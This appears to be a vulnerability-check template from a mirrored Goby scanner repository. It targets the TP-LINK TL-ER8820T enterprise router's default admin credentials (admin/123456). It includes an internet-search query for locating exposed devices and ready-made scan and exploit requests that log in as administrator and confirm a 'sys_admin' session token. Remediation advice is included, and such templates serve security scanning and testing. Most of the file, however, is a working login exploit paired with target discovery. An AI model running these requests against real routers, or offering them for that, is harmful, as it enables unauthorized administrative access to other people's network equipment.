qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/TP-LINK-TL-ER8820T-Default-...

162 lines
5.5 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "TP-LINK TL-ER8820T Default password",
"Description": "<p>Tl-er8820t is a new generation of high-performance 10 Gigabit enterprise router launched by TP-LINK.</p><p>Username admin password 123456</p>",
"Product": "TL-ER8820T",
"Homepage": "https://www.tp-link.com.cn",
"DisclosureDate": "2022-03-30",
"Author": "xiaodan",
"FofaQuery": "body=\"TL-ER8820T\"",
"GobyQuery": "body=\"TL-ER8820T\"",
"Level": "1",
"Impact": "<p>Tl-er8820t is a new generation of high-performance 10 Gigabit enterprise router launched by TP-LINK.</p><p>Username admin password 123456</p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers, and special characters, with more than 8 digits.</p><p>2. If not necessary, prohibit public network access to the system.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/",
"follow_redirect": true,
"header": {
"Content-Type": "application/json; charset=UTF-8"
},
"data_type": "text",
"data": "{\"method\":\"do\",\"login\":{\"username\":\"admin\",\"password\":\"0KcgeXhc9TefbwK\"}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "stok\":\"",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"role\":\"sys_admin\"",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/",
"follow_redirect": true,
"header": {
"Content-Type": "application/json; charset=UTF-8"
},
"data_type": "text",
"data": "{\"method\":\"do\",\"login\":{\"username\":\"admin\",\"password\":\"0KcgeXhc9TefbwK\"}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "stok\":\"",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"role\":\"sys_admin\"",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|text|admin:123456"
]
}
],
"Tags": [
"default password"
],
"VulType": [
"default password"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
"CNVD-2021-34456"
],
"CVSSScore": "5",
"Translation": {
"CN": {
"Name": "TP-LINK TL-ER8820T 默认密码",
"Product": "TL-ER8820T",
"Description": "<p><span style=\"color: rgb(62, 62, 62); font-size: 14px;\">TL-ER8820T是TP-LINK推出的新一代高性能万兆企业路由器。</span></p><p>用户名<span style=\"color: rgb(247, 49, 49); font-size: 13px;\">admin</span>密码<span style=\"color: rgb(247, 49, 49); font-size: 13px;\">123456</span></p>",
"Recommendation": "<p>1、修改默认口令密码最好包含大小写字母、数字和特殊字符等且位数大于8位。</p><p>2、如非必要禁止公网访问该系统。</p><p>3、通过防火墙等安全设备设置访问策略设置白名单访问。</p>",
"Impact": "<p><span style=\"color: rgb(62, 62, 62); font-size: 14px;\">TL-ER8820T是TP-LINK推出的新一代高性能万兆企业路由器。</span></p><p>用户名<span style=\"color: rgb(247, 49, 49); font-size: 13px;\">admin</span>密码<span style=\"color: rgb(247, 49, 49); font-size: 13px;\">123456</span></p>",
"VulType": [
"默认口令"
],
"Tags": [
"默认口令"
]
},
"EN": {
"Name": "TP-LINK TL-ER8820T Default password",
"Product": "TL-ER8820T",
"Description": "<p>Tl-er8820t is a new generation of high-performance 10 Gigabit enterprise router launched by TP-LINK.</p><p>Username admin password 123456</p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers, and special characters, with more than 8 digits.</p><p>2. If not necessary, prohibit public network access to the system.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"Impact": "<p>Tl-er8820t is a new generation of high-performance 10 Gigabit enterprise router launched by TP-LINK.</p><p>Username admin password 123456</p>",
"VulType": [
"default password"
],
"Tags": [
"default password"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink